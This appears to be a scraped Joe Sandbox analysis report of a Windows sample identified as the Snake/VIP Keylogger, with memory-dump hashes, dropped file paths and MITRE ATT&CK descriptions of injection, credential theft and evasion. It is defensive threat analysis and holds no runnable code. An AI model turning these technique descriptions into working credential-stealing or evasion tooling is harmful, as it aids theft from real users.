Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f635d2d9b51d7395bdff65872f111a9c9411fe8de5a303b6bfd1bd88dfab9e78
Instruction ID: db8cfe9a5269b80211ebb607dba456c0403f579192cc5d7d749a334f38f8a52d
Opcode Fuzzy Hash: f635d2d9b51d7395bdff65872f111a9c9411fe8de5a303b6bfd1bd88dfab9e78
Instruction Fuzzy Hash: F6D01231D2022B968B00A6A5DC044DEB739EE96261B544626D52437154EB70265986E1

Function 0189AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29620f2cce989ccb6079ee8c80d1d40239b1138a11abc49aed3615629f905a6
Instruction ID: c5f6c6343a4598a798ddcf83b3bb0871ce0b570a14eba24dbfe7339ddc82ce44
Opcode Fuzzy Hash: e29620f2cce989ccb6079ee8c80d1d40239b1138a11abc49aed3615629f905a6
Instruction Fuzzy Hash: 22D0673AB40018AFCB149F98EC408DDF776FB9C221B048516E915A3265C6319965DB60

Function 01896748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1065634f4e49f7b1949389ba1e41e2ce24a643e20bfdc25d870980de95f1d21d
Instruction ID: 508b17e4e9df37e8033e2ecea044c9d1b4951eb09d8ebf4e204a898c8b540bbe
Opcode Fuzzy Hash: 1065634f4e49f7b1949389ba1e41e2ce24a643e20bfdc25d870980de95f1d21d
Instruction Fuzzy Hash: 2FC01230104B094AC506FB69FD49515772EEFD0240790DA10F0060654EDEB82CC54690

Non-executed Functions

Function 018948CD Relevance: 8.8, Strings: 7, Instructions: 60COMMON

Download Yara Rule

Strings

p, xrefs: 01894912
p, xrefs: 01894922
p, xrefs: 01894962
)q^, xrefs: 018948DA
p, xrefs: 018948D2
)q^, xrefs: 018948EA
)q^, xrefs: 01894939

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: )q^$)q^$)q^$p$p$p$p
API String ID: 0-3715730869
Opcode ID: c2e3eeb9a7a1f0fca29d2e086df1b3f00639cb4171e044a88a93ac94c9f08de7
Instruction ID: 802401334da158cbb204280f6bd750e7ae2b5cc9b8e14c0d44fe65d846c8c9a5
Opcode Fuzzy Hash: c2e3eeb9a7a1f0fca29d2e086df1b3f00639cb4171e044a88a93ac94c9f08de7
Instruction Fuzzy Hash: 5D11305280E3CA5FD71A86295CA85953F74AE2B254F0E05DBC8C5DB1A3E5181A0BC762

Function 01896920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;cq, xrefs: 01896952
\;cq, xrefs: 01896936
\;cq, xrefs: 0189695E
\;cq, xrefs: 0189692C

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: \;cq$\;cq$\;cq$\;cq
API String ID: 0-2961067002
Opcode ID: 587684c30b9dcfe98f3309fba89ca4820451e01b60820c362f7451a3cacf7756
Instruction ID: ffb2fb837776954747feed9ebeda0a82fe1c7c75f0d5cc3c0c80eaefe28e26f3
Opcode Fuzzy Hash: 587684c30b9dcfe98f3309fba89ca4820451e01b60820c362f7451a3cacf7756
Instruction Fuzzy Hash: BF018B31710119CFDF288E2DC540AA677E6AFC8764739416AE506CB3B5FB31ED418790

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hesap_Hareketleri_10122024_html.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hesap_Hareketleri_10122024_html.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UDYiGmDlq.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yixa5x1.liv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aioph3vh.0a0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgc3ycdc.pov.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwagobef.da2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pcb53zlg.yta.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcefdyoo.zoc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uu4apgkq.hzz.psm1

Windows Analysis Report
Hesap_Hareketleri_10122024_html.exe

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre